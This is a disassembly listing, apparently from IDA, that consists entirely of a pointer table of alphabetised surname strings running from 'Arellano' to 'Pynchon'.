dd offset aArellano ; "Arellano"
dd offset aAristotle ; "Aristotle"
dd offset aArjas ; "Arjas"
dd offset aArky ; "Arky"
dd offset aAtkins ; "Atkins"
dd offset aAugustus ; "Augustus"
dd offset aAurelius ; "Aurelius"
dd offset aAxelrod ; "Axelrod"
dd offset aAxworthy ; "Axworthy"
dd offset aAyiemba ; "Ayiemba"
dd offset aAykroyd ; "Aykroyd"
dd offset aAyling ; "Ayling"
dd offset aAzima ; "Azima"
dd offset aBachmuth ; "Bachmuth"
dd offset aBackus ; "Backus"
dd offset aBady ; "Bady"
dd offset aBaglivo ; "Baglivo"
dd offset aBagnold ; "Bagnold"
dd offset aBailar ; "Bailar"
dd offset aBakanowsky ; "Bakanowsky"
dd offset aBaleja ; "Baleja"
dd offset aBallatori ; "Ballatori"
dd offset aBallew ; "Ballew"
dd offset aBaltz ; "Baltz"
dd offset aBanta ; "Banta"
dd offset aBarabesi ; "Barabesi"
dd offset aBarajas ; "Barajas"
dd offset aBaranczak ; "Baranczak"
dd offset aBaranowska ; "Baranowska"
dd offset aBarberi ; "Barberi"
dd offset aBarbetti ; "Barbetti"
dd offset aBarneson ; "Barneson"
dd offset aBarnett ; "Barnett"
dd offset aBarriola ; "Barriola"
dd offset aBarry ; "Barry"
dd offset aBartholomew ; "Bartholomew"
dd offset aBartolome ; "Bartolome"
dd offset aBartoo ; "Bartoo"
dd offset aBasavappa ; "Basavappa"
dd offset aBashevis ; "Bashevis"
dd offset aBatchelder ; "Batchelder"
dd offset aBaumiller ; "Baumiller"
dd offset aBayles ; "Bayles"
dd offset aBayo ; "Bayo"
dd offset aBeacon ; "Beacon"
dd offset aBeal ; "Beal"
dd offset aBean ; "Bean"
dd offset aBeckman ; "Beckman"
dd offset aBeder ; "Beder"
dd offset aBedford ; "Bedford"
dd offset aBehenna ; "Behenna"
dd offset aBelanger ; "Belanger"
dd offset aBelaoussof ; "Belaoussof"
dd offset aBelfer ; "Belfer"
dd offset aBelinCollart ; "Belin-Collart"
dd offset aBellavance ; "Bellavance"
dd offset aBellhouse ; "Bellhouse"
dd offset aBellini ; "Bellini"
dd offset aBelloc ; "Belloc"
dd offset aBenedictDye ; "Benedict-Dye"
dd offset aBergson ; "Bergson"
dd offset aBerkeJenkins ; "Berke-Jenkins"
dd offset aBernardo ; "Bernardo"
dd offset aBernassola ; "Bernassola"
dd offset aBernston ; "Bernston"
dd offset aBerrizbeitia ; "Berrizbeitia"
dd offset aBetti ; "Betti"
dd offset aBeynart ; "Beynart"
dd offset aBiagioli ; "Biagioli"
dd offset aBickel ; "Bickel"
dd offset aBinion ; "Binion"
dd offset aBir ; "Bir"
dd offset aBisema ; "Bisema"
dd offset aBisho ; "Bisho"
dd offset aBlackbourn ; "Blackbourn"
dd offset aBlackwell ; "Blackwell"
dd offset aBlagg ; "Blagg"
dd offset aBlakemore ; "Blakemore"
dd offset aBlanke ; "Blanke"
dd offset aBliss ; "Bliss"
dd offset aBlizard ; "Blizard"
dd offset aBloch ; "Bloch"
dd offset aBloembergen ; "Bloembergen"
dd offset aBloemhof ; "Bloemhof"
dd offset aBloxham ; "Bloxham"
dd offset aBlyth ; "Blyth"
dd offset aBolger ; "Bolger"
dd offset aBolick ; "Bolick"
dd offset aBollinger ; "Bollinger"
dd offset aBologna ; "Bologna"
dd offset aBoner ; "Boner"
dd offset aBonham ; "Bonham"
dd offset aBoniface ; "Boniface"
dd offset aBontempo ; "Bontempo"
dd offset aBook ; "Book"
dd offset aBookbinder ; "Bookbinder"
dd offset aBoone ; "Boone"
dd offset aBoorstin ; "Boorstin"
dd offset aBorack ; "Borack"
dd offset aBorden ; "Borden"
dd offset aBossi ; "Bossi"
dd offset aBothman ; "Bothman"
dd offset aBotosh ; "Botosh"
dd offset aBoudin ; "Boudin"
dd offset aBoudrot ; "Boudrot"
dd offset aBourneuf ; "Bourneuf"
dd offset aBowers ; "Bowers"
dd offset aBoxer ; "Boxer"
dd offset aBoyajian ; "Boyajian"
dd offset aBoyes ; "Boyes"
dd offset aBoyland ; "Boyland"
dd offset aBoym ; "Boym"
dd offset aBoyne ; "Boyne"
dd offset aBracalente ; "Bracalente"
dd offset aBradac ; "Bradac"
dd offset aBradach ; "Bradach"
dd offset aBrecht ; "Brecht"
dd offset aBreed ; "Breed"
dd offset aBrenan ; "Brenan"
dd offset aBrennan ; "Brennan"
dd offset aBrewer ; "Brewer"
dd offset aBrewer ; "Brewer"
dd offset aBridgeman ; "Bridgeman"
dd offset aBridges ; "Bridges"
dd offset aBrinton ; "Brinton"
dd offset aBritz ; "Britz"
dd offset aBroca ; "Broca"
dd offset aBrook ; "Brook"
dd offset aBrzycki ; "Brzycki"
dd offset aBuchan ; "Buchan"
dd offset aBudding ; "Budding"
dd offset aBullard ; "Bullard"
dd offset aBunton ; "Bunton"
dd offset aBurden ; "Burden"
dd offset aBurdzy ; "Burdzy"
dd offset aBurke ; "Burke"
dd offset aBurridge ; "Burridge"
dd offset aBusetta ; "Busetta"
dd offset aByatt ; "Byatt"
dd offset aByerly ; "Byerly"
dd offset aByrd ; "Byrd"
dd offset aCage ; "Cage"
dd offset aCalnan ; "Calnan"
dd offset aCammelli ; "Cammelli"
dd offset aCammilleri ; "Cammilleri"
dd offset aCanley ; "Canley"
dd offset aCapanni ; "Capanni"
dd offset aCaperton ; "Caperton"
dd offset aCapocaccia ; "Capocaccia"
dd offset aCapodilupo ; "Capodilupo"
dd offset aCappuccio ; "Cappuccio"
dd offset aCapursi ; "Capursi"
dd offset aCaratozzolo ; "Caratozzolo"
dd offset aCarayannopoulo ; "Carayannopoulos"
dd offset aCarlin ; "Carlin"
dd offset aCarlos ; "Carlos"
dd offset aCarlyle ; "Carlyle"
dd offset aCarmichael ; "Carmichael"
dd offset aCaroti ; "Caroti"
dd offset aCarper ; "Carper"
dd offset aCartmill ; "Cartmill"
dd offset aCascio ; "Cascio"
dd offset aCase ; "Case"
dd offset aCaspar ; "Caspar"
dd offset aCastelda ; "Castelda"
dd offset aCavanagh ; "Cavanagh"
dd offset aCavell ; "Cavell"
dd offset aCeniceros ; "Ceniceros"
dd offset aCerioli ; "Cerioli"
dd offset aChapman ; "Chapman"
dd offset aCharles ; "Charles"
dd offset aCheang ; "Cheang"
dd offset aCherry ; "Cherry"
dd offset aChervinsky ; "Chervinsky"
dd offset aChiassino ; "Chiassino"
dd offset aChien ; "Chien"
dd offset aChildress ; "Childress"
dd offset aChilds ; "Childs"
dd offset aChinipardaz ; "Chinipardaz"
dd offset aChinman ; "Chinman"
dd offset aChristenson ; "Christenson"
dd offset aChristian ; "Christian"
dd offset aChristiano ; "Christiano"
dd offset aChristie ; "Christie"
dd offset aChristopher ; "Christopher"
dd offset aChu ; "Chu"
dd offset aChupasko ; "Chupasko"
dd offset aChurch ; "Church"
dd offset aCiampaglia ; "Ciampaglia"
dd offset aCicero ; "Cicero"
dd offset aCifarelli ; "Cifarelli"
dd offset aClaffey ; "Claffey"
dd offset aClancy ; "Clancy"
dd offset aClark ; "Clark"
dd offset aClement ; "Clement"
dd offset aClifton ; "Clifton"
dd offset aClow ; "Clow"
dd offset aCoblenz ; "Coblenz"
dd offset aCoito ; "Coito"
dd offset aColdren ; "Coldren"
dd offset aColella ; "Colella"
dd offset aCollard ; "Collard"
dd offset aCollis ; "Collis"
dd offset aCompton ; "Compton"
dd offset aCompton ; "Compton"
dd offset aComstock ; "Comstock"
dd offset aConcino ; "Concino"
dd offset aCondodina ; "Condodina"
dd offset aConnors ; "Connors"
dd offset aCorey ; "Corey"
dd offset aCornish ; "Cornish"
dd offset aCosmides ; "Cosmides"
dd offset aCounter ; "Counter"
dd offset aCoutaux ; "Coutaux"
dd offset aCrawford ; "Crawford"
dd offset aCrocker ; "Crocker"
dd offset aCroshaw ; "Croshaw"
dd offset aCroxen ; "Croxen"
dd offset aCroxton ; "Croxton"
dd offset aCui ; "Cui"
dd offset aCurrier ; "Currier"
dd offset aCutler ; "Cutler"
dd offset aCvek ; "Cvek"
dd offset aCyders ; "Cyders"
dd offset aDasilva ; "daSilva"
dd offset aDaldalian ; "Daldalian"
dd offset aDaly ; "Daly"
dd offset aDAmbra ; "D'Ambra"
dd offset aDanieli ; "Danieli"
dd offset aDante ; "Dante"
dd offset aDapice ; "Dapice"
dd offset aDArcangelo ; "D'arcangelo"
dd offset aDas ; "Das"
dd offset aDasgupta ; "Dasgupta"
dd offset aDaskalu ; "Daskalu"
dd offset aDavid ; "David"
dd offset aDawkins ; "Dawkins"
dd offset aDegennaro ; "DeGennaro"
dd offset aDelapena ; "DeLaPena"
dd offset aDelEnclos ; "del'Enclos"
dd offset aDerousse ; "deRousse"
dd offset aDebroff ; "Debroff"
dd offset aDees ; "Dees"
dd offset aDefeciani ; "Defeciani"
dd offset aDelattre ; "Delattre"
dd offset aDeleonRendon ; "Deleon-Rendon"
dd offset aDelger ; "Delger"
dd offset aDellAcqua ; "Dell'acqua"
dd offset aDeming ; "Deming"
dd offset aDempster ; "Dempster"
dd offset aDemusz ; "Demusz"
dd offset aDenault ; "Denault"
dd offset aDenham ; "Denham"
dd offset aDenison ; "Denison"
dd offset aDesombre ; "Desombre"
dd offset aDeutsch ; "Deutsch"
dd offset aDFini ; "D'fini"
dd offset aDicks ; "Dicks"
dd offset aDiefenbach ; "Diefenbach"
dd offset aDifabio ; "Difabio"
dd offset aDifronzo ; "Difronzo"
dd offset aDilworth ; "Dilworth"
dd offset aDionysius ; "Dionysius"
dd offset aDirksen ; "Dirksen"
dd offset aDockery ; "Dockery"
dd offset aDoherty ; "Doherty"
dd offset aDonahue ; "Donahue"
dd offset aDonner ; "Donner"
dd offset aDoonan ; "Doonan"
dd offset aDore ; "Dore"
dd offset aDorf ; "Dorf"
dd offset aDosi ; "Dosi"
dd offset aDoty ; "Doty"
dd offset aDoug ; "Doug"
dd offset aDowsland ; "Dowsland"
dd offset aDrinker ; "Drinker"
dd offset aDSouza ; "D'souza"
dd offset aDuffin ; "Duffin"
dd offset aDurrett ; "Durrett"
dd offset aDussault ; "Dussault"
dd offset aDwyer ; "Dwyer"
dd offset aEardley ; "Eardley"
dd offset aEbeling ; "Ebeling"
dd offset aEckel ; "Eckel"
dd offset aEdley ; "Edley"
dd offset aEdner ; "Edner"
dd offset aEdward ; "Edward"
dd offset aEickenhorst ; "Eickenhorst"
dd offset aEliasson ; "Eliasson"
dd offset aElmendorf ; "Elmendorf"
dd offset aElmerick ; "Elmerick"
dd offset aElvis ; "Elvis"
dd offset aEncinas ; "Encinas"
dd offset aEnyeart ; "Enyeart"
dd offset aEppling ; "Eppling"
dd offset aErbach ; "Erbach"
dd offset aErdman ; "Erdman"
dd offset aErdos ; "Erdos"
dd offset aErez ; "Erez"
dd offset aEspinoza ; "Espinoza"
dd offset aEstes ; "Estes"
dd offset aEtter ; "Etter"
dd offset aEuripides ; "Euripides"
dd offset aEverett ; "Everett"
dd offset aFabbris ; "Fabbris"
dd offset aFagan ; "Fagan"
dd offset aFaioes ; "Faioes"
dd offset aFalcoAcosta ; "Falco-Acosta"
dd offset aFalorsi ; "Falorsi"
dd offset aFaris ; "Faris"
dd offset aFarone ; "Farone"
dd offset aFarren ; "Farren"
dd offset aFasso ; "Fasso'"
dd offset aFates ; "Fates"
dd offset aFeigenbaum ; "Feigenbaum"
dd offset aFejzo ; "Fejzo"
dd offset aFeldman ; "Feldman"
dd offset aFernald ; "Fernald"
dd offset aFernandes ; "Fernandes"
dd offset aFerrante ; "Ferrante"
dd offset aFerriell ; "Ferriell"
dd offset aFeuer ; "Feuer"
dd offset aFido ; "Fido"
dd offset aField ; "Field"
dd offset aFink ; "Fink"
dd offset aFinkelstein ; "Finkelstein"
dd offset aFinnegan ; "Finnegan"
dd offset aFiorina ; "Fiorina"
dd offset aFisk ; "Fisk"
dd offset aFitzmaurice ; "Fitzmaurice"
dd offset aFlier ; "Flier"
dd offset aFlores ; "Flores"
dd offset aFolks ; "Folks"
dd offset aForester ; "Forester"
dd offset aFortes ; "Fortes"
dd offset aFortier ; "Fortier"
dd offset aFossey ; "Fossey"
dd offset aFossi ; "Fossi"
dd offset aFrancisco ; "Francisco"
dd offset aFranklinKenea ; "Franklin-Kenea"
dd offset aFranz ; "Franz"
dd offset aFrazierDavis ; "Frazier-Davis"
dd offset aFreid ; "Freid"
dd offset aFreundlich ; "Freundlich"
dd offset aFried ; "Fried"
dd offset aFriedland ; "Friedland"
dd offset aFrisken ; "Frisken"
dd offset aFrowiss ; "Frowiss"
dd offset aFryberger ; "Fryberger"
dd offset aFrye ; "Frye"
dd offset aFujiiAbe ; "Fujii-Abe"
dd offset aFuller ; "Fuller"
dd offset aFurth ; "Furth"
dd offset aFusaro ; "Fusaro"
dd offset aGabrielli ; "Gabrielli"
dd offset aGaggiotti ; "Gaggiotti"
dd offset aGaleotti ; "Galeotti"
dd offset aGalwey ; "Galwey"
dd offset aGambini ; "Gambini"
dd offset aGarfield ; "Garfield"
dd offset aGarman ; "Garman"
dd offset aGaronna ; "Garonna"
dd offset aGeller ; "Geller"
dd offset aGemberling ; "Gemberling"
dd offset aGeorgi ; "Georgi"
dd offset aGerrett ; "Gerrett"
dd offset aGhorai ; "Ghorai"
dd offset aGibbens ; "Gibbens"
dd offset aGibson ; "Gibson"
dd offset aGilbert ; "Gilbert"
dd offset aGili ; "Gili"
dd offset aGill ; "Gill"
dd offset aGillispie ; "Gillispie"
dd offset aGist ; "Gist"
dd offset aGleason ; "Gleason"
dd offset aGlegg ; "Glegg"
dd offset aGlendon ; "Glendon"
dd offset aGoldfarb ; "Goldfarb"
dd offset aGoncalves ; "Goncalves"
dd offset aGood ; "Good"
dd offset aGoodearl ; "Goodearl"
dd offset aGoody ; "Goody"
dd offset aGozzi ; "Gozzi"
dd offset aGravell ; "Gravell"
dd offset aGreenberg ; "Greenberg"
dd offset aGreenfeld ; "Greenfeld"
dd offset aGriffiths ; "Griffiths"
dd offset aGrigoletto ; "Grigoletto"
dd offset aGrummell ; "Grummell"
dd offset aGruner ; "Gruner"
dd offset aGruppe ; "Gruppe"
dd offset aGuenthart ; "Guenthart"
dd offset aGunn ; "Gunn"
dd offset aGuo ; "Guo"
dd offset aHa ; "Ha"
dd offset aHaar ; "Haar"
dd offset aHackman ; "Hackman"
dd offset aHackshaw ; "Hackshaw"
dd offset aHaley ; "Haley"
dd offset aHalkias ; "Halkias"
dd offset aHallowell ; "Hallowell"
dd offset aHalpert ; "Halpert"
dd offset aHambarzumjan ; "Hambarzumjan"
dd offset aHamer ; "Hamer"
dd offset aHammerness ; "Hammerness"
dd offset aHand ; "Hand"
dd offset aHanssen ; "Hanssen"
dd offset aHarding ; "Harding"
dd offset aHargraves ; "Hargraves"
dd offset aHarlow ; "Harlow"
dd offset aHarrigan ; "Harrigan"
dd offset aHartman ; "Hartman"
dd offset aHartmann ; "Hartmann"
dd offset aHartnett ; "Hartnett"
dd offset aHarwell ; "Harwell"
dd offset aHaviaras ; "Haviaras"
dd offset aHawkes ; "Hawkes"
dd offset aHayes ; "Hayes"
dd offset aHaynes ; "Haynes"
dd offset aHazlewood ; "Hazlewood"
dd offset aHeermans ; "Heermans"
dd offset aHeft ; "Heft"
dd offset aHeiland ; "Heiland"
dd offset aHellman ; "Hellman"
dd offset aHellmiss ; "Hellmiss"
dd offset aHelprin ; "Helprin"
dd offset aHemphill ; "Hemphill"
dd offset aHenery ; "Henery"
dd offset aHenrichs ; "Henrichs"
dd offset aHernandez ; "Hernandez"
dd offset aHerrera ; "Herrera"
dd offset aHester ; "Hester"
dd offset aHeubert ; "Heubert"
dd offset aHeyeck ; "Heyeck"
dd offset aHimmelfarb ; "Himmelfarb"
dd offset aHind ; "Hind"
dd offset aHirst ; "Hirst"
dd offset aHitchcock ; "Hitchcock"
dd offset aHoang ; "Hoang"
dd offset aHock ; "Hock"
dd offset aHoffer ; "Hoffer"
dd offset aHoffman ; "Hoffman"
dd offset aHokanson ; "Hokanson"
dd offset aHokoda ; "Hokoda"
dd offset aHolmes ; "Holmes"
dd offset aHoloien ; "Holoien"
dd offset aHolter ; "Holter"
dd offset aHolway ; "Holway"
dd offset aHolzman ; "Holzman"
dd offset aHooker ; "Hooker"
dd offset aHopkins ; "Hopkins"
dd offset aHorsley ; "Horsley"
dd offset aHoshida ; "Hoshida"
dd offset aHostage ; "Hostage"
dd offset aHottle ; "Hottle"
dd offset aHoward ; "Howard"
dd offset aHoy ; "Hoy"
dd offset aHuey ; "Huey"
dd offset aHuidekoper ; "Huidekoper"
dd offset aHungerford ; "Hungerford"
dd offset aHuntington ; "Huntington"
dd offset aHupp ; "Hupp"
dd offset aHurtubise ; "Hurtubise"
dd offset aHutchings ; "Hutchings"
dd offset aHyde ; "Hyde"
dd offset aIaquinta ; "Iaquinta"
dd offset aIchikawa ; "Ichikawa"
dd offset aIgarashi ; "Igarashi"
dd offset aInamura ; "Inamura"
dd offset aInniss ; "Inniss"
dd offset aIsaac ; "Isaac"
dd offset aIsaievych ; "Isaievych"
dd offset aIsbill ; "Isbill"
dd offset aIsserman ; "Isserman"
dd offset aIyer ; "Iyer"
dd offset aJacenko ; "Jacenko"
dd offset aJackson ; "Jackson"
dd offset aJagers ; "Jagers"
dd offset aJagger ; "Jagger"
dd offset aJagoe ; "Jagoe"
dd offset aJain ; "Jain"
dd offset aJamil ; "Jamil"
dd offset aJanjigian ; "Janjigian"
dd offset aJarnagin ; "Jarnagin"
dd offset aJarrell ; "Jarrell"
dd offset aJay ; "Jay"
dd offset aJeffers ; "Jeffers"
dd offset aJellis ; "Jellis"
dd offset aJenkins ; "Jenkins"
dd offset aJespersen ; "Jespersen"
dd offset aJewett ; "Jewett"
dd offset aJohannesson ; "Johannesson"
dd offset aJohannsen ; "Johannsen"
dd offset aJohns ; "Johns"
dd offset aJolly ; "Jolly"
dd offset aJorgensen ; "Jorgensen"
dd offset aJucks ; "Jucks"
dd offset aJuliano ; "Juliano"
dd offset aJulious ; "Julious"
dd offset aKabbash ; "Kabbash"
dd offset aKaboolian ; "Kaboolian"
dd offset aKafadar ; "Kafadar"
dd offset aKalbfleisch ; "Kalbfleisch"
dd offset aKaligian ; "Kaligian"
dd offset aKalil ; "Kalil"
dd offset aKalinowski ; "Kalinowski"
dd offset aKalman ; "Kalman"
dd offset aKamel ; "Kamel"
dd offset aKangis ; "Kangis"
dd offset aKarpouzes ; "Karpouzes"
dd offset aKassower ; "Kassower"
dd offset aKasten ; "Kasten"
dd offset aKawachi ; "Kawachi"
dd offset aKee ; "Kee"
dd offset aKeenan ; "Keenan"
dd offset aKeepper ; "Keepper"
dd offset aKeith ; "Keith"
dd offset aKelker ; "Kelker"
dd offset aKelsey ; "Kelsey"
dd offset aKempton ; "Kempton"
dd offset aKemsley ; "Kemsley"
dd offset aKendall ; "Kendall"
dd offset aKerry ; "Kerry"
dd offset aKeul ; "Keul"
dd offset aKhong ; "Khong"
dd offset aKimmel ; "Kimmel"
dd offset aKimmett ; "Kimmett"
dd offset aKimura ; "Kimura"
dd offset aKindall ; "Kindall"
dd offset aKinsley ; "Kinsley"
dd offset aKippenberger ; "Kippenberger"
dd offset aKirscht ; "Kirscht"
dd offset aKittridge ; "Kittridge"
dd offset aKleckner ; "Kleckner"
dd offset aKleiman ; "Kleiman"
dd offset aKleinfelder ; "Kleinfelder"
dd offset aKlemperer ; "Klemperer"
dd offset aKling ; "Kling"
dd offset aKlinkenborg ; "Klinkenborg"
dd offset aKlint ; "Klint"
dd offset aKnuff ; "Knuff"
dd offset aKobrick ; "Kobrick"
dd offset aKoch ; "Koch"
dd offset aKohn ; "Kohn"
dd offset aKoivumaki ; "Koivumaki"
dd offset aKommer ; "Kommer"
dd offset aKoniaris ; "Koniaris"
dd offset aKonrad ; "Konrad"
dd offset aKool ; "Kool"
dd offset aKorzybski ; "Korzybski"
dd offset aKotter ; "Kotter"
dd offset aKovaks ; "Kovaks"
dd offset aKraemer ; "Kraemer"
dd offset aKrailo ; "Krailo"
dd offset aKrasney ; "Krasney"
dd offset aKraus ; "Kraus"
dd offset aKroemer ; "Kroemer"
dd offset aKrysiak ; "Krysiak"
dd offset aKuenzli ; "Kuenzli"
dd offset aKumar ; "Kumar"
dd offset aKusman ; "Kusman"
dd offset aKuwabara ; "Kuwabara"
dd offset aLa ; "La"
dd offset aLabunka ; "Labunka"
dd offset aLafler ; "Lafler"
dd offset aLaing ; "Laing"
dd offset aLallemant ; "Lallemant"
dd offset aLandes ; "Landes"
dd offset aLankes ; "Lankes"
dd offset aLantieri ; "Lantieri"
dd offset aLanzit ; "Lanzit"
dd offset aLaserna ; "Laserna"
dd offset aLashley ; "Lashley"
dd offset aLawless ; "Lawless"
dd offset aLecar ; "Lecar"
dd offset aLecce ; "Lecce"
dd offset aLeclercq ; "Leclercq"
dd offset aLeite ; "Leite"
dd offset aLenard ; "Lenard"
dd offset aLEnclos ; "l'Enclos"
dd offset aLesser ; "Lesser"
dd offset aLessi ; "Lessi"
dd offset aLiakos ; "Liakos"
dd offset aLidano ; "Lidano"
dd offset aLiem ; "Liem"
dd offset aLight ; "Light"
dd offset aLightfoot ; "Lightfoot"
dd offset aLim ; "Lim"
dd offset aLinares ; "Linares"
dd offset aLinda ; "Linda"
dd offset aLinder ; "Linder"
dd offset aLine ; "Line"
dd offset aLinehan ; "Linehan"
dd offset aLinzee ; "Linzee"
dd offset aLippmann ; "Lippmann"
dd offset aLipponen ; "Lipponen"
dd offset aLittle ; "Little"
dd offset aLitvak ; "Litvak"
dd offset aLivernash ; "Livernash"
dd offset aLivi ; "Livi"
dd offset aLivolsi ; "Livolsi"
dd offset aLizardo ; "Lizardo"
dd offset aLocatelli ; "Locatelli"
dd offset aLongworth ; "Longworth"
dd offset aLoss ; "Loss"
dd offset aLoveman ; "Loveman"
dd offset aLowenstein ; "Lowenstein"
dd offset aLoza ; "Loza"
dd offset aLubin ; "Lubin"
dd offset aLucas ; "Lucas"
dd offset aLuciano ; "Luciano"
dd offset aLuczkow ; "Luczkow"
dd offset aLuecke ; "Luecke"
dd offset aLunetta ; "Lunetta"
dd offset aLuoma ; "Luoma"
dd offset aLussier ; "Lussier"
dd offset aLutcavage ; "Lutcavage"
dd offset aLuzader ; "Luzader"
dd offset aMa ; "Ma"
dd offset aMaccormac ; "Maccormac"
dd offset aMacdonald ; "Macdonald"
dd offset aMaceachern ; "Maceachern"
dd offset aMacintyre ; "Macintyre"
dd offset aMackenney ; "Mackenney"
dd offset aMacmillan ; "MacMillan"
dd offset aMacy ; "Macy"
dd offset aMadigan ; "Madigan"
dd offset aMaggio ; "Maggio"
dd offset aMahony ; "Mahony"
dd offset aMaier ; "Maier"
dd offset aMaineHershey ; "Maine-Hershey"
dd offset aMaisano ; "Maisano"
dd offset aMalatesta ; "Malatesta"
dd offset aMaller ; "Maller"
dd offset aMalova ; "Malova"
dd offset aManalis ; "Manalis"
dd offset aMandel ; "Mandel"
dd offset aManganiello ; "Manganiello"
dd offset aMantovan ; "Mantovan"
dd offset aMarch ; "March"
dd offset aMarchbanks ; "Marchbanks"
dd offset aMarcus ; "Marcus"
dd offset aMargalit ; "Margalit"
dd offset aMargetts ; "Margetts"
dd offset aMarques ; "Marques"
dd offset aMartinez ; "Martinez"
dd offset aMartochio ; "Martochio"
dd offset aMarton ; "Marton"
dd offset aMarubini ; "Marubini"
dd offset aMass ; "Mass"
dd offset aMatalka ; "Matalka"
dd offset aMatarazzo ; "Matarazzo"
dd offset aMatsukata ; "Matsukata"
dd offset aMattson ; "Mattson"
dd offset aMauzy ; "Mauzy"
dd offset aMay ; "May"
dd offset aMazzali ; "Mazzali"
dd offset aMazziotta ; "Mazziotta"
dd offset aMcbride ; "Mcbride"
dd offset aMccaffery ; "Mccaffery"
dd offset aMccall ; "Mccall"
dd offset aMcclearn ; "Mcclearn"
dd offset aMcdowell ; "Mcdowell"
dd offset aMcelroy ; "Mcelroy"
dd offset aMcfadden ; "McFadden"
dd offset aMcghee ; "Mcghee"
dd offset aMcgoldrick ; "Mcgoldrick"
dd offset aMcilroy ; "McIlroy"
dd offset aMcintosh ; "Mcintosh"
dd offset aMckenna ; "Mckenna"
dd offset aMclane ; "Mclane"
dd offset aMclaren ; "Mclaren"
dd offset aMcnealy ; "Mcnealy"
dd offset aMcnulty ; "Mcnulty"
dd offset aMeccariello ; "Meccariello"
dd offset aMemisoglu ; "Memisoglu"
dd offset aMenzies ; "Menzies"
dd offset aMerikoski ; "Merikoski"
dd offset aMerlani ; "Merlani"
dd offset aMerminod ; "Merminod"
dd offset aMerseth ; "Merseth"
dd offset aMerz ; "Merz"
dd offset aMetelka ; "Metelka"
dd offset aMetropolis ; "Metropolis"
dd offset aMeurer ; "Meurer"
dd offset aMichelman ; "Michelman"
dd offset aMiddle ; "Middle"
dd offset aMieher ; "Mieher"
dd offset aMills ; "Mills"
dd offset aMinh ; "Minh"
dd offset aMini ; "Mini"
dd offset aMinichiello ; "Minichiello"
dd offset aGonzalez ; "Gonzalez"
dd offset aMitropoulos ; "Mitropoulos"
dd offset aMittal ; "Mittal"
dd offset aMocroft ; "Mocroft"
dd offset aModestino ; "Modestino"
dd offset aMoeller ; "Moeller"
dd offset aMohr ; "Mohr"
dd offset aMoiamedi ; "Moiamedi"
dd offset aMonque ; "Monque"
dd offset aMontilio ; "Montilio"
dd offset aMooredech_ ; "MooreDeCh."
dd offset aMorani ; "Morani"
dd offset aMoreton ; "Moreton"
dd offset aMorrison ; "Morrison"
dd offset aMorrow ; "Morrow"
dd offset aMortimer ; "Mortimer"
dd offset aMosher ; "Mosher"
dd offset aMosler ; "Mosler"
dd offset aMostafavi ; "Mostafavi"
dd offset aMotooka ; "Motooka"
dd offset aMudarri ; "Mudarri"
dd offset aMuello ; "Muello"
dd offset aMugnai ; "Mugnai"
dd offset aMulkern ; "Mulkern"
dd offset aMulroy ; "Mulroy"
dd offset aMumford ; "Mumford"
dd offset aMussachio ; "Mussachio"
dd offset aNaddeo ; "Naddeo"
dd offset aNapolitano ; "Napolitano"
dd offset aNardi ; "Nardi"
dd offset aNardone ; "Nardone"
dd offset aNaviaux ; "Naviaux"
dd offset aNayduch ; "Nayduch"
dd offset aNelson ; "Nelson"
dd offset aNenna ; "Nenna"
dd offset aNesci ; "Nesci"
dd offset aNeuman ; "Neuman"
dd offset aNewfeld ; "Newfeld"
dd offset aNewlin ; "Newlin"
dd offset aNg ; "Ng"
dd offset aNi_0 ; "Ni"
dd offset aNickerson ; "Nickerson"
dd offset aNickoloff ; "Nickoloff"
dd offset aNisenson ; "Nisenson"
dd offset aNitabach ; "Nitabach"
dd offset aNotman ; "Notman"
dd offset aNuzum ; "Nuzum"
dd offset aOcougne ; "Ocougne"
dd offset aOgata ; "Ogata"
dd offset aOh ; "Oh"
dd offset aOHagan ; "O'hagan"
dd offset aOldford ; "Oldford"
dd offset aOlsen ; "Olsen"
dd offset aOlson ; "Olson"
dd offset aOlszewski ; "Olszewski"
dd offset aOMalley ; "O'malley"
dd offset aOman ; "Oman"
dd offset aOMeara ; "O'meara"
dd offset aOpel ; "Opel"
dd offset aOray ; "Oray"
dd offset aOrfield ; "Orfield"
dd offset aOrsi ; "Orsi"
dd offset aOspina ; "Ospina"
dd offset aOstrowski ; "Ostrowski"
dd offset aOttaviani ; "Ottaviani"
dd offset aOtten ; "Otten"
dd offset aOuchida ; "Ouchida"
dd offset aOvid ; "Ovid"
dd offset aPaesdealmeida ; "PaesDealmeida"
dd offset aPaine ; "Paine"
dd offset aPalayoor ; "Palayoor"
dd offset aPalepu ; "Palepu"
dd offset aPallara ; "Pallara"
dd offset aPalmitesta ; "Palmitesta"
dd offset aPanadero ; "Panadero"
dd offset aPanizzon ; "Panizzon"
dd offset aPantilla ; "Pantilla"
dd offset aPaoletti ; "Paoletti"
dd offset aParmeggiani ; "Parmeggiani"
dd offset aParris ; "Parris"
dd offset aPartridge ; "Partridge"
dd offset aPascucci ; "Pascucci"
dd offset aPatefield ; "Patefield"
dd offset aPatrick ; "Patrick"
dd offset aPattullo ; "Pattullo"
dd offset aPavetti ; "Pavetti"
dd offset aPavlon ; "Pavlon"
dd offset aPawloski ; "Pawloski"
dd offset aPaynter ; "Paynter"
dd offset aPeabody ; "Peabody"
dd offset aPearlberg ; "Pearlberg"
dd offset aPederson ; "Pederson"
dd offset aPeishel ; "Peishel"
dd offset aPenny ; "Penny"
dd offset aPereira ; "Pereira"
dd offset aPerko ; "Perko"
dd offset aPerlak ; "Perlak"
dd offset aPerlman ; "Perlman"
dd offset aPerna ; "Perna"
dd offset aPerone ; "Perone"
dd offset aPerrimon ; "Perrimon"
dd offset aPeters ; "Peters"
dd offset aPetruzello ; "Petruzello"
dd offset aPettibone ; "Pettibone"
dd offset aPettit ; "Pettit"
dd offset aPfister ; "Pfister"
dd offset aPilbeam ; "Pilbeam"
dd offset aPinot ; "Pinot"
dd offset aPlancon ; "Plancon"
dd offset aPlant ; "Plant"
dd offset aPlasket ; "Plasket"
dd offset aPlous ; "Plous"
dd offset aPo ; "Po"
dd offset aPocobene ; "Pocobene"
dd offset aPoincaire ; "Poincaire"
dd offset aPointer ; "Pointer"
dd offset aPoirier ; "Poirier"
dd offset aPolak ; "Polak"
dd offset aPolanyi ; "Polanyi"
dd offset aPolitis ; "Politis"
dd offset aPoma ; "Poma"
dd offset aPoolman ; "Poolman"
dd offset aPowers ; "Powers"
dd offset aPresper ; "Presper"
dd offset aPreucel ; "Preucel"
dd offset aPrevost ; "Prevost"
dd offset aPritchard ; "Pritchard"
dd offset aPritz ; "Pritz"
dd offset aProietti ; "Proietti"
dd offset aProthrowStith ; "Prothrow-Stith"
dd offset aPuccia ; "Puccia"
dd offset aPugh ; "Pugh"
dd offset aPynchon ; "Pynchon"
